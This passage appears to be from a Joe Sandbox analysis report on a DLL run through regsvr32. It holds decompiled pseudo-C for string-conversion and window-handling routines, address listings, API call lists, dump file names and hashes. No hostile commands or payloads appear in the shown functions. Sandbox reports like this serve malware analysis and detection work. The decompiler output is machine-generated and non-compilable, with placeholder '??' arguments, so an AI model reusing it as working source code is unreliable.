									r9d =  *((intOrPtr*)(_t116 + 0x78));
									_t67 = _t77;
									 *(_t119 + 0x20) =  *((intOrPtr*)(_t116 + 0x80));
									GetStringTypeA(??, ??, ??, ??, ??);
									if(_t111 != 0) {
										E10039620(_t95, _t111);
									}
								} else {
									_t67 = _t65;
									 *((intOrPtr*)(_t119 + 0x28)) = 0;
									 *(_t119 + 0x20) = _t111;
									E10050730(_t65, _t48, _t77, _t99, _t111, _t113, _t139, _t116 + 0x78, _t130, _t131, _t133, _t136, _t139, _t141);
									_t111 = _t94;
									if(_t94 == 0) {
										goto L10;
									} else {
										_t139 = _t94;
										goto L37;
									}
								}
							} else {
								goto L10;
							}
						}
					} else {
						 *0x10075be8 = 1;
						L15:
						_t78 =  *(_t116 + 0x88);
						_t76 = 0;
						if(_t78 == 0) {
							_t78 =  *( *_t133 + 4);
						}
						r9d =  *((intOrPtr*)(_t116 + 0x78));
						_t67 = _t78;
						_t72 =  !=  ? 9 : 1;
						 *((intOrPtr*)(_t119 + 0x28)) = _t76;
						 *(_t119 + 0x20) = _t111;
						_t56 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
						_t83 = _t56;
						_t135 = _t56;
						if(_t83 == 0 || _t83 <= 0) {
							L10:
						} else {
							_t96 = 0xfffffff0;
							if(_t135 > 0xfffffff0) {
								goto L10;
							} else {
								_t106 = _t135 + _t135 + 0x10;
								if(_t106 > 0x400) {
									_t57 = E10039550(0xfffffff0, _t99, _t106, _t111, _t113);
									_t101 = 0xfffffff0;
									if(0xfffffff0 != 0) {
										 *0xfffffff0 = 0xdddd;
										goto L27;
									}
									goto L28;
								} else {
									_t23 = _t106 + 0xf; // 0x87
									_t97 = _t23;
									if(_t97 <= _t106) {
										_t97 = 0xfffffff0;
									}
									_t96 = _t97 & 0xfffffff0;
									_t57 = E100534D0(_t56, _t96, _t130, _t131);
									_t119 = _t119 - _t96;
									_t101 = _t119 + 0x30;
									if(_t101 == 0) {
										goto L10;
									} else {
										 *_t101 = 0xcccc;
										L27:
										_t101 = _t101 + 0x10;
										L28:
										if(_t101 == 0) {
											goto L10;
										} else {
											E1003A240(_t57, _t67, 0, _t101, 0x1005ea8c, _t135 + _t135);
											r9d =  *((intOrPtr*)(_t116 + 0x78));
											_t67 = _t78;
											 *((intOrPtr*)(_t119 + 0x28)) = r12d;
											 *(_t119 + 0x20) = _t101;
											_t59 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
											if(_t59 != 0) {
												r8d = _t59;
												_t67 = r15d;
												_t76 = GetStringTypeW(??, ??, ??, ??);
											}
											_t31 = _t101 - 0x10; // -16
											_t108 = _t31;
											if( *((intOrPtr*)(_t101 - 0x10)) == 0xdddd) {
												E10039620(_t96, _t108);
											}
										}
									}
								}
							}
						}
					}
				}
				return E10038D20(_t67,  *(_t116 + 8) ^ _t116);
			}






























                                                                              0x1004c050
                                                                              0x1004c050
                                                                              0x1004c050
                                                                              0x1004c050
                                                                              0x1004c050
                                                                              0x1004c050
                                                                              0x1004c050
                                                                              0x1004c050
                                                                              0x1004c056
                                                                              0x1004c05d
                                                                              0x1004c062
                                                                              0x1004c066
                                                                              0x1004c06a
                                                                              0x1004c06e
                                                                              0x1004c072
                                                                              0x1004c076
                                                                              0x1004c07a
                                                                              0x1004c07e
                                                                              0x1004c085
                                                                              0x1004c088
                                                                              0x1004c08c
                                                                              0x1004c092
                                                                              0x1004c095
                                                                              0x1004c09a
                                                                              0x1004c09d
                                                                              0x1004c123
                                                                              0x1004c126
                                                                              0x00000000
                                                                              0x1004c12c
                                                                              0x1004c12f
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004c12f
                                                                              0x1004c0a3
                                                                              0x1004c0a3
                                                                              0x1004c0a9
                                                                              0x1004c0b4
                                                                              0x1004c0bf
                                                                              0x1004c0d6
                                                                              0x1004c11d
                                                                              0x00000000
                                                                              0x1004c0d8
                                                                              0x1004c0d8
                                                                              0x1004c0e2
                                                                              0x1004c0e2
                                                                              0x1004c0ec
                                                                              0x1004c0ee
                                                                              0x1004c0f2
                                                                              0x1004c0f2
                                                                              0x1004c0f5
                                                                              0x1004c0fd
                                                                              0x1004c0ff
                                                                              0x1004c103
                                                                              0x1004c103
                                                                              0x1004c106
                                                                              0x1004c108
                                                                              0x1004c110
                                                                              0x1004c24a
                                                                              0x1004c274
                                                                              0x1004c274
                                                                              0x1004c27b
                                                                              0x1004c285
                                                                              0x1004c287
                                                                              0x1004c28c
                                                                              0x1004c297
                                                                              0x1004c29c
                                                                              0x1004c29c
                                                                              0x1004c24c
                                                                              0x1004c255
                                                                              0x1004c257
                                                                              0x1004c25b
                                                                              0x1004c260
                                                                              0x1004c268
                                                                              0x1004c26b
                                                                              0x00000000
                                                                              0x1004c271
                                                                              0x1004c271
                                                                              0x00000000
                                                                              0x1004c271
                                                                              0x1004c26b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004c110
                                                                              0x1004c0c1
                                                                              0x1004c0c1
                                                                              0x1004c131
                                                                              0x1004c131
                                                                              0x1004c137
                                                                              0x1004c13b
                                                                              0x1004c141
                                                                              0x1004c141
                                                                              0x1004c14a
                                                                              0x1004c15b
                                                                              0x1004c15d
                                                                              0x1004c160
                                                                              0x1004c164
                                                                              0x1004c169
                                                                              0x1004c16f
                                                                              0x1004c171
                                                                              0x1004c174
                                                                              0x1004c116
                                                                              0x1004c178
                                                                              0x1004c178
                                                                              0x1004c185
                                                                              0x00000000
                                                                              0x1004c187
                                                                              0x1004c187
                                                                              0x1004c193
                                                                              0x1004c1ca
                                                                              0x1004c1d2
                                                                              0x1004c1d5
                                                                              0x1004c1d7
                                                                              0x00000000
                                                                              0x1004c1d7
                                                                              0x00000000
                                                                              0x1004c195
                                                                              0x1004c195
                                                                              0x1004c195
                                                                              0x1004c19c
                                                                              0x1004c19e
                                                                              0x1004c19e
                                                                              0x1004c1a8
                                                                              0x1004c1ac
                                                                              0x1004c1b1
                                                                              0x1004c1b4
                                                                              0x1004c1bc
                                                                              0x00000000
                                                                              0x1004c1c2
                                                                              0x1004c1c2
                                                                              0x1004c1dd
                                                                              0x1004c1dd
                                                                              0x1004c1e1
                                                                              0x1004c1e4
                                                                              0x00000000
                                                                              0x1004c1ea
                                                                              0x1004c1f3
                                                                              0x1004c1f8
                                                                              0x1004c204
                                                                              0x1004c206
                                                                              0x1004c20b
                                                                              0x1004c210
                                                                              0x1004c218
                                                                              0x1004c221
                                                                              0x1004c227
                                                                              0x1004c230
                                                                              0x1004c230
                                                                              0x1004c239
                                                                              0x1004c239
                                                                              0x1004c23d
                                                                              0x1004c23f
                                                                              0x1004c23f
                                                                              0x1004c244
                                                                              0x1004c1e4
                                                                              0x1004c1bc
                                                                              0x1004c193
                                                                              0x1004c185
                                                                              0x1004c174
                                                                              0x1004c0bf
                                                                              0x1004c2d0

                                                                              APIs
                                                                              • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000A,1004C402), ref: 1004C0B7
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000A,1004C402), ref: 1004C0CD
                                                                                • Part of subcall function 10039550: RtlAllocateHeap.NTDLL(?,?,?,?,1003D3CA,?,?,?,?,10042A23,?,?,?,?,10042AF7), ref: 100395B1
                                                                              • MultiByteToWideChar.KERNEL32 ref: 1004C169
                                                                              • MultiByteToWideChar.KERNEL32 ref: 1004C210
                                                                              • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000A,1004C402), ref: 1004C22A
                                                                              • GetStringTypeA.KERNEL32 ref: 1004C28C
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: StringType$ByteCharMultiWide$AllocateErrorHeapLast
                                                                              • String ID:
                                                                              • API String ID: 2745877085-0
                                                                              • Opcode ID: 1bc3f40b20514107ef6e16545b091a5b5947ac3e5dbbeedef3c5e99fbfed6fed
                                                                              • Instruction ID: 1b47a1b331cd93b45bf58f0edaa192496e2e496beb97b056fa8891515417edbe
                                                                              • Opcode Fuzzy Hash: 1bc3f40b20514107ef6e16545b091a5b5947ac3e5dbbeedef3c5e99fbfed6fed
                                                                              • Instruction Fuzzy Hash: 0061C032300A848AEB50CF25D840B9937E0F749BE8F654225EE9D87BA5DF79D980C748
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1002CA44 Relevance: 9.1, APIs: 6, Instructions: 130COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: MetricsSystem$IntersectRect
                                                                              • String ID:
                                                                              • API String ID: 1124862357-0
                                                                              • Opcode ID: a71c280785ce04165765be32babd90f5882c9152fce41ed64c99f6a88d575884
                                                                              • Instruction ID: 9bee8ad4fe153a3024d9d72ea59ca73ca1b08d2aa41746dac0e487fd65c58f5c
                                                                              • Opcode Fuzzy Hash: a71c280785ce04165765be32babd90f5882c9152fce41ed64c99f6a88d575884
                                                                              • Instruction Fuzzy Hash: 67510673A18249DBC764CF79E684A4D77E1F788748F105219EB8983B18DB38E960CF04
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1001F6A0 Relevance: 9.1, APIs: 6, Instructions: 121windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Window$DesktopEnableEnabledMessageSend
                                                                              • String ID:
                                                                              • API String ID: 1626031737-0
                                                                              • Opcode ID: 1a845ad8e8caeabaf6245132bdc2dbdd678507e6f28137524ecde99b02e68010
                                                                              • Instruction ID: dbae9c60859fc8861bfc5b811e9de6f25735ad22c55996f46120b434045affde
                                                                              • Opcode Fuzzy Hash: 1a845ad8e8caeabaf6245132bdc2dbdd678507e6f28137524ecde99b02e68010
                                                                              • Instruction Fuzzy Hash: 2941F735305B4142EB55DB25AC543B96290EB8DBE4F054238EEAE8F7A5EF38D8C2C600
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10026C84 Relevance: 9.1, APIs: 6, Instructions: 114threadwindowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 56%
                                                                              			E10026C84(void* __ebx, signed int __edx, void* __esi, void* __rcx, void* __rdx, void* __r8, void* __r9, void* __r11) {
				signed int _v72;
				signed int _v82;
				signed int _v600;
				char _v608;
				intOrPtr _v616;
				signed int _t30;
				void* _t36;
				signed int _t42;
				signed int _t44;
				intOrPtr _t47;
				signed long long _t61;
				signed long long _t62;
				signed long long _t63;
				signed long long _t65;
				void* _t76;
				signed int* _t77;
				signed long long _t78;
				signed long long _t79;
				signed long long _t84;
				void* _t85;
				void* _t86;

				_t83 = __r11;
				_t82 = __r9;
				_t64 = __rcx;
				_t46 = __esi;
				_t42 = __edx;
				_t36 = __ebx;
				_t61 =  *0x1006f4c8; // 0x6f13091946cb
				_t62 = _t61 ^ _t79;
				_v72 = _t62;
				_t76 = __rcx;
				r13d = r9d;
				_t44 = r8d;
				_t86 = __rdx;
				E10026B2C(0, _t62);
				E10026B8C(_t36, 0, _t42, __esi, _t62, _t64,  &_v608, __r8, __r9, __r11);
				_t84 = _t62;
				if(_t62 != _v608) {
					_t42 = 1;
					EnableWindow(??, ??);
				}
				_t47 = 0;
				_t65 = _t84;
				_t63 = _t78;
				_v616 = 0;
				GetWindowThreadProcessId(??, ??);
				if(_t84 == _t78 || _v616 != GetCurrentProcessId()) {
					L6:
					if(_t76 != _t78) {
						_t7 = _t76 + 0xf0; // 0xf0
						_t63 = _t7;
					}
					goto L8;
				} else {
					r9d = 0;
					r8d = 0;
					_t42 = 0x376;
					_t65 = _t84;
					SendMessageW(??, ??, ??, ??);
					if(_t62 == _t78) {
						goto L6;
					} else {
						_t63 = _t62;
						L8:
						_t39 = 0;
						if(_t63 != _t65) {
							_t47 =  *_t63;
							if(r13d != 0) {
								 *_t63 = _t85 + 0x30000;
							}
						}
						if((dil & 0x000000f0) == 0) {
							_t30 = _t44 & 0x0000000f;
							if(_t30 <= 1) {
								_t44 = _t44 | 0x00000030;
							} else {
								if(_t30 + 0xfffffffd <= 1) {
									_t44 = _t44 | 0x00000020;
								}
							}
						}
						_v600 = _t39;
						if(_t76 == _t65) {
							r13d = 0x104;
							_t77 =  &_v600;
							r8d = r13d;
							GetModuleFileNameW(??, ??, ??);
							r13d = 0;
							_t39 =  ==  ? r13w : _v82 & 0x0000ffff;
							_v82 =  ==  ? r13w : _v82 & 0x0000ffff;
						} else {
							_t77 =  *((intOrPtr*)(_t76 + 0xa0));
							r13d = 0;
						}
						r9d = _t44;
						E1000F7FC(_t36, _t39, _t42, _t46, _t62, _t84, _t86, _t77, _t82, _t83);
						if(_t63 != _t85) {
							 *_t63 = _t47;
						}
						if(_v608 != _t85) {
							EnableWindow();
						}
						E10026B2C(1, _t62);
						return E10038D20(1, _v72 ^ _t79);
					}
				}
			}
























                                                                              0x10026c84
                                                                              0x10026c84
                                                                              0x10026c84
                                                                              0x10026c84
                                                                              0x10026c84
                                                                              0x10026c84
                                                                              0x10026c96
                                                                              0x10026c9d
                                                                              0x10026ca0
                                                                              0x10026ca8
                                                                              0x10026cad
                                                                              0x10026cb0
                                                                              0x10026cb3
                                                                              0x10026cb6
                                                                              0x10026cc2
                                                                              0x10026ccc
                                                                              0x10026ccf
                                                                              0x10026cd1
                                                                              0x10026cd9
                                                                              0x10026cd9
                                                                              0x10026cdf
                                                                              0x10026ce6
                                                                              0x10026ce9
                                                                              0x10026cec
                                                                              0x10026cf0
                                                                              0x10026cf9
                                                                              0x10026d25
                                                                              0x10026d28
                                                                              0x10026d2a
                                                                              0x10026d2a
                                                                              0x10026d2a
                                                                              0x00000000
                                                                              0x10026d07
                                                                              0x10026d07
                                                                              0x10026d0a
                                                                              0x10026d0d
                                                                              0x10026d12
                                                                              0x10026d15
                                                                              0x10026d1e
                                                                              0x00000000
                                                                              0x10026d20
                                                                              0x10026d20
                                                                              0x10026d31
                                                                              0x10026d31
                                                                              0x10026d36
                                                                              0x10026d3b
                                                                              0x10026d3d
                                                                              0x10026d46
                                                                              0x10026d46
                                                                              0x10026d3d
                                                                              0x10026d4c
                                                                              0x10026d50
                                                                              0x10026d56
                                                                              0x10026d65
                                                                              0x10026d58
                                                                              0x10026d5e
                                                                              0x10026d60
                                                                              0x10026d60
                                                                              0x10026d5e
                                                                              0x10026d56
                                                                              0x10026d6b
                                                                              0x10026d70
                                                                              0x10026d7e
                                                                              0x10026d89
                                                                              0x10026d8e
                                                                              0x10026d91
                                                                              0x10026da2
                                                                              0x10026da8
                                                                              0x10026dad
                                                                              0x10026d72
                                                                              0x10026d72
                                                                              0x10026d79
                                                                              0x10026d79
                                                                              0x10026db5
                                                                              0x10026dc1
                                                                              0x10026dcb
                                                                              0x10026dcd
                                                                              0x10026dcd
                                                                              0x10026dd4
                                                                              0x10026de0
                                                                              0x10026de0
                                                                              0x10026deb
                                                                              0x10026e13
                                                                              0x10026e13
                                                                              0x10026d1e

                                                                              APIs
                                                                                • Part of subcall function 10026B8C: GetWindowLongW.USER32 ref: 10026BEE
                                                                                • Part of subcall function 10026B8C: GetParent.USER32 ref: 10026BFD
                                                                                • Part of subcall function 10026B8C: GetParent.USER32 ref: 10026C1C
                                                                                • Part of subcall function 10026B8C: GetLastActivePopup.USER32 ref: 10026C34
                                                                                • Part of subcall function 10026B8C: IsWindowEnabled.USER32 ref: 10026C4A
                                                                                • Part of subcall function 10026B8C: EnableWindow.USER32 ref: 10026C61
                                                                              • EnableWindow.USER32 ref: 10026CD9
                                                                              • GetWindowThreadProcessId.USER32 ref: 10026CF0
                                                                              • GetCurrentProcessId.KERNEL32 ref: 10026CFB
                                                                              • SendMessageW.USER32 ref: 10026D15
                                                                              • GetModuleFileNameW.KERNEL32 ref: 10026D91
                                                                              • EnableWindow.USER32 ref: 10026DE0
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Enable$ParentProcess$ActiveCurrentEnabledFileLastLongMessageModuleNamePopupSendThread
                                                                              • String ID:
                                                                              • API String ID: 1819874647-0
                                                                              • Opcode ID: b413923972bc425e49a123b3ec6389c05cf9e8b6f2349534280275fdb4921a33
                                                                              • Instruction ID: a35dd97f0994601a05630e4421678ef76c574e96bcea9d3ba37c275699de4fc8
                                                                              • Opcode Fuzzy Hash: b413923972bc425e49a123b3ec6389c05cf9e8b6f2349534280275fdb4921a33
                                                                              • Instruction Fuzzy Hash: FC41BD36B0598846EA31DB21FC507AA7695FB8CBD8F851526DE4A47B48DF7CC884CB00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10026B8C Relevance: 9.1, APIs: 6, Instructions: 80COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 38%
                                                                              			E10026B8C(void* __ebx, void* __ecx, void* __edx, void* __esi, long long __rax, long long __rcx, long long* __rdx, void* __r8, void* __r9, void* __r11) {
				int _t5;
				long long _t16;
				long long _t26;
				long long _t27;
				long long _t29;
				long long _t40;
				long long* _t41;
				long long _t42;

				_t26 = __rax;
				_t41 = __rdx;
				_t42 = __rcx;
				_t29 = __rcx;
				if(__rcx != 0) {
					goto L10;
				} else {
					_t5 = E10009A4C(__ebx, __ecx, __edx, __esi, __rax, __r8, __r9, __r11);
					_t29 =  *((intOrPtr*)(__rax + 0x1b8));
					if(_t29 == 0) {
						E10023E40(__rax);
						if(_t26 == 0) {
							_t5 = 0;
						} else {
							_t5 =  *((intOrPtr*)( *_t26 + 0xe8))();
						}
						if(_t26 != 0) {
							_t29 =  *((intOrPtr*)(_t26 + 0x40));
							goto L9;
						} else {
						}
					} else {
						_t29 =  *((intOrPtr*)(_t29 + 0x40));
						L9:
						_t16 = _t29;
						if(_t16 != 0) {
							while(1) {
								L10:
								_t5 = GetWindowLongW();
								asm("bt eax, 0x1e");
								if(_t16 >= 0) {
									goto L12;
								}
								_t5 = GetParent();
								_t29 = _t26;
								if(_t26 != 0) {
									continue;
								}
								goto L12;
							}
						}
					}
				}
				L12:
				_t40 = _t29;
				_t27 = _t29;
				if(_t29 != 0) {
					do {
						_t40 = _t27;
						_t5 = GetParent(??);
					} while (_t27 != 0);
				}
				if(_t42 == 0 && _t29 != 0) {
					_t5 = GetLastActivePopup();
					_t29 = _t27;
				}
				if(_t41 != 0) {
					if(_t40 == 0) {
						L22:
						 *_t41 = 0;
					} else {
						_t5 = IsWindowEnabled();
						if(_t5 == 0 || _t40 == _t29) {
							goto L22;
						} else {
							 *_t41 = _t40;
							_t5 = EnableWindow(??, ??);
						}
					}
				}
				return _t5;
			}











                                                                              0x10026b8c
                                                                              0x10026b98
                                                                              0x10026b9b
                                                                              0x10026b9e
                                                                              0x10026ba1
                                                                              0x00000000
                                                                              0x10026ba3
                                                                              0x10026ba3
                                                                              0x10026ba8
                                                                              0x10026bb2
                                                                              0x10026bba
                                                                              0x10026bc2
                                                                              0x10026bd2
                                                                              0x10026bc4
                                                                              0x10026bca
                                                                              0x10026bca
                                                                              0x10026bd7
                                                                              0x10026bdd
                                                                              0x00000000
                                                                              0x10026bd9
                                                                              0x10026bd9
                                                                              0x10026bb4
                                                                              0x10026bb4
                                                                              0x10026be1
                                                                              0x10026be1
                                                                              0x10026be4
                                                                              0x10026be6
                                                                              0x10026be6
                                                                              0x10026bee
                                                                              0x10026bf4
                                                                              0x10026bf8
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10026bfd
                                                                              0x10026c06
                                                                              0x10026c09
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10026c09
                                                                              0x10026be6
                                                                              0x10026be4
                                                                              0x10026bb2
                                                                              0x10026c0b
                                                                              0x10026c0e
                                                                              0x10026c11
                                                                              0x10026c14
                                                                              0x10026c16
                                                                              0x10026c19
                                                                              0x10026c1c
                                                                              0x10026c22
                                                                              0x10026c16
                                                                              0x10026c2a
                                                                              0x10026c34
                                                                              0x10026c3a
                                                                              0x10026c3a
                                                                              0x10026c40
                                                                              0x10026c45
                                                                              0x10026c69
                                                                              0x10026c69
                                                                              0x10026c47
                                                                              0x10026c4a
                                                                              0x10026c52
                                                                              0x00000000
                                                                              0x10026c59
                                                                              0x10026c5e
                                                                              0x10026c61
                                                                              0x10026c61
                                                                              0x10026c52
                                                                              0x10026c45
                                                                              0x10026c7b

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                              • String ID:
                                                                              • API String ID: 670545878-0
                                                                              • Opcode ID: e708296d932d99c405045c0e34349e18c8943a03b7e2f245dffb3a0f1deae3d7
                                                                              • Instruction ID: 778ba3e3d017a00f5d901a634fce9712f7f84978043787ffc22b4b810077fcbe
                                                                              • Opcode Fuzzy Hash: e708296d932d99c405045c0e34349e18c8943a03b7e2f245dffb3a0f1deae3d7
                                                                              • Instruction Fuzzy Hash: 32212F31306A8181EE4EEF12BD543F85295DB4DFD5FAE8434DE8A4B745FF29C8814210
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10001C50 Relevance: 9.1, APIs: 6, Instructions: 73windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$InvalidateRect$UpdateWindow
                                                                              • String ID:
                                                                              • API String ID: 4081309542-0
                                                                              • Opcode ID: 98da4626d0856fb7bcc82e6a09c5f79bb79fc5fd2575aad2efd1e115ea439db9
                                                                              • Instruction ID: 77168e8d09f8e283a9294432cb8c48ab282f7b091dd240db7f8c0f11518a9d81
                                                                              • Opcode Fuzzy Hash: 98da4626d0856fb7bcc82e6a09c5f79bb79fc5fd2575aad2efd1e115ea439db9
                                                                              • Instruction Fuzzy Hash: CB216D36710A8082E710CF22E8007DAB762FBC9BD9F811212EE8A57B58CF79D541CB00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10019D9C Relevance: 9.1, APIs: 6, Instructions: 69windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 23%
                                                                              			E10019D9C(void* __ebx, char* __rax, intOrPtr* __rcx, intOrPtr* __rdx, void* __r8, void* __r9, void* __r11) {
				void* _v100;
				char _v112;
				void* _v136;
				void* _v144;
				char _v152;
				void* _v164;
				void* _v168;
				void* _v172;
				void* _v180;
				void* _v184;
				void* __rbx;
				intOrPtr _t36;
				intOrPtr _t45;
				void* _t49;
				char* _t53;
				char* _t55;
				char* _t67;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t53 = __rax;
				_t71 = __rcx;
				_t70 = __rdx;
				_t49 = r9d;
				E1000CAC4(__ebx,  &_v152, __rdx, __r8, __r11);
				r9d = 0;
				r8d = 0;
				SendMessageW(??, ??, ??, ??);
				if(_t53 != 0) {
					SelectObject();
					_t55 = _t53;
				}
				_t67 =  &_v112;
				GetTextMetricsW(??, ??);
				_t51 = _t55;
				if(_t55 != 0) {
					_t67 = _t55;
					SelectObject(??, ??);
				}
				E1000CB4C(_t51, _t55,  &_v152, _t67);
				SetRectEmpty(??);
				r8d = _t49;
				 *((intOrPtr*)( *_t71 + 0x280))();
				r8d = 0;
				 *((intOrPtr*)( *_t71 + 0x220))();
				 *_t70 = 0x7fff;
				GetSystemMetrics(??);
				_t36 = _t53 + _t71 - 1;
				_t45 =  *((intOrPtr*)(_t71 + 0x100));
				 *((intOrPtr*)(_t70 + 4)) = _t36;
				if(_t36 < _t45) {
					 *((intOrPtr*)(_t70 + 4)) = _t45;
				}
				return _t36;
			}






















                                                                              0x10019d9c
                                                                              0x10019da8
                                                                              0x10019dab
                                                                              0x10019db5
                                                                              0x10019db8
                                                                              0x10019dc1
                                                                              0x10019dc8
                                                                              0x10019dcb
                                                                              0x10019dd6
                                                                              0x10019de0
                                                                              0x10019de6
                                                                              0x10019de6
                                                                              0x10019dee
                                                                              0x10019df3
                                                                              0x10019df9
                                                                              0x10019dfc
                                                                              0x10019e03
                                                                              0x10019e06
                                                                              0x10019e06
                                                                              0x10019e11
                                                                              0x10019e1b
                                                                              0x10019e29
                                                                              0x10019e2f
                                                                              0x10019e3e
                                                                              0x10019e49
                                                                              0x10019e5d
